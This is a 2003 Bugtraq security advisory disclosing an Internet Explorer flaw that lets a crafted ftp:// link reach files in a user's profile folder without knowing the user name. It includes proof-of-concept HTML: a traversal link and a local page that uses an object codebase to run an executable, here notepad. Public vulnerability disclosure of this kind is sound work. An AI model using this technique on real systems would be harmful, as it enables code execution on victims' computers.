Message-ID: <000701c32b5b$fb2cee70$6401a8c0@EnSof>
Date: Thu, 5 Jun 2003 21:14:11 +0900
From: "Eiji James Yoshida" <ptrs-ejy@...iij4u.or.jp>
To: <bugtraq@...urityfocus.com>
Subject: Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title:
~~~~~~~~~~~~~~~~~
Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability
[http://www.geocities.co.jp/SiliconValley/1667/advisory07e.html]


Date:
~~~~~~~~~~~~~~~~~
5 June 2003


Author:
~~~~~~~~~~~~~~~~~
Eiji James Yoshida [ptrs-ejy@...iij4u.or.jp]


Vulnerable:
~~~~~~~~~~~~~~~~~
Windows 2000 SP3 with Internet Explorer 6.0 SP1


Overview:
~~~~~~~~~~~~~~~~~
This vulnerability lets a remote attacker reach files under the current user's
%USERPROFILE% folder without having to guess the target user name, because
Internet Explorer resolves the attacker's link relative to that folder itself.

ex.) %USERPROFILE% = "C:\Documents and Settings\victim"


Details:
~~~~~~~~~~~~~~~~~
The vulnerability lies in the address Internet Explorer assigns to its
"Cannot find server" error page. For a link of the form ftp://%@..., the
address of that page becomes
"res://C:\WINNT\System32\shdoclc.dll/dnserror.htm#file://C:\Documents and
Settings\%USERNAME%\Desktop\ftp:\\%@\".
The part after the "#" is a file:// URL rooted in the current user's Desktop
folder, with the failed "ftp:\\%@\" appended as though it were a subdirectory.
Whatever follows "ftp://%@" in the original link is therefore treated as a
path relative to %USERPROFILE%\Desktop, and "../" sequences in it walk out of
the Desktop folder into the rest of the profile. IE fills in %USERNAME% on
the victim's side, so the attacker never needs to know it.


Exploit code:
~~~~~~~~~~~~~~~~~
**************************************************
This exploit loads %TEMP%\exploit.html, which you must create beforehand
(on Windows 2000, %TEMP% is %USERPROFILE%\Local Settings\Temp).
Then open ftpexp.html and click its "Exploit" link.
**************************************************

[exploit.html]
<!-- Opened as a local file, so IE runs it with local-machine privileges.
     The classid is not installed, so IE tries to load the codebase instead,
     here the local notepad.exe, which is launched as proof of execution.
     The object is inserted from a timer so the document has finished
     parsing first. -->
<html>
<script>
setTimeout(function(){document.body.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="file://c:/winnt/notepad.exe"></object>'}, 0);
</script>
</html>

[ftpexp.html]
<!-- Everything after "ftp://%@" is resolved relative to
     %USERPROFILE%\Desktop\ftp:\%@\ (see Details). The four "../" steps
     climb from there to the profile folder, then descend into
     Local Settings\Temp, so the link reaches %TEMP%\exploit.html
     without knowing the user name. -->
<html>
<a href="ftp://%@.../../../../Local Settings/Temp/exploit.html" TYPE="text/html" target="_blank">Exploit</a>
</html>


Workaround:
~~~~~~~~~~~~~~~~~
None.


Vendor Status:
~~~~~~~~~~~~~~~~~
Microsoft was notified on 7 November 2002.
A patch for this bug will be released in the future.


- ------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: ptrs-ejy@...iij4u.or.jp
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
- ------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8ckt
Comment: Eiji James Yoshida

iQA/AwUBPt8y+vfWv13kjJq0EQJ+tgCeKwVv/+MtKD2zGtp29pjwlDR119MAoJOk
ABdf8AVY3NtdcBgzsS7VHm+J
=52pX
-----END PGP SIGNATURE-----
